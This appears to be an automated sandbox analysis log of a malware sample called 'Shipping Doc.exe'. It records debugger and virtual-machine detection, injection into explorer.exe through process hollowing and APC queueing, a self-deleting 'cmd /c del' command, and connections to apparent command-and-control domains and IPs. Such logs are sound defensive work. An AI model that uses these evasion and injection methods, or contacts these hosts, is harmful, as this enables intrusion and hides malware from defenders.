          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Shipping Doc.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Shipping Doc.exe TID: 5516Thread sleep time: -39781s >= -30000s
          Source: C:\Users\user\Desktop\Shipping Doc.exe TID: 6132Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 3340Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 1392Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Shipping Doc.exeThread delayed: delay time: 39781
          Source: C:\Users\user\Desktop\Shipping Doc.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000006.00000000.280697838.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000006.00000000.280697838.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000006.00000000.280370116.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.279908328.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000006.00000000.273037707.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000006.00000000.280697838.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000006.00000000.280697838.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000006.00000000.280812513.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000006.00000000.311184656.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000006.00000000.279908328.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000006.00000000.279908328.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000006.00000000.279908328.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_0040ACD0 LdrLoadDll,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05413540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053B4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05399100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053B7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05468D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0541A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_054241E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05392D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05448DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053BC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_054169A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053AB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0542C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05461074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05452073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0546740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05416C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05464015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053B746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05417016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053B0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05468CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0542B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0542B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05416CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05399080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_054514FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05413884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05394F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05468B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05468F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053BF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0546070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0542FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053AFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0545131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053AEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0544D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0545138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05417794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05465BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05424257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0544B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05468A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053B3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05399240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0544FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0544FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05468ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0542FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05460EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_054146A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053C36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Shipping Doc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.davinescosmetics.com
          Source: C:\Windows\explorer.exeDomain query: www.bigdaddy.fish
          Source: C:\Windows\explorer.exeNetwork Connect: 208.113.204.236 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Shipping Doc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Shipping Doc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Shipping Doc.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Shipping Doc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Shipping Doc.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: DE0000
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess created: C:\Users\user\Desktop\Shipping Doc.exe C:\Users\user\Desktop\Shipping Doc.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Shipping Doc.exe'
          Source: explorer.exe, 00000006.00000000.262269287.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000006.00000000.262650603.0000000001980000.00000002.00000001.sdmp, cscript.exe, 0000000F.00000002.479722473.0000000003C20000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.280697838.000000000871F000.00000004.00000001.sdmp, cscript.exe, 0000000F.00000002.479722473.0000000003C20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.262650603.0000000001980000.00000002.00000001.sdmp, cscript.exe, 0000000F.00000002.479722473.0000000003C20000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.262650603.0000000001980000.00000002.00000001.sdmp, cscript.exe, 0000000F.00000002.479722473.0000000003C20000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Users\user\Desktop\Shipping Doc.exe VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Shipping Doc.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
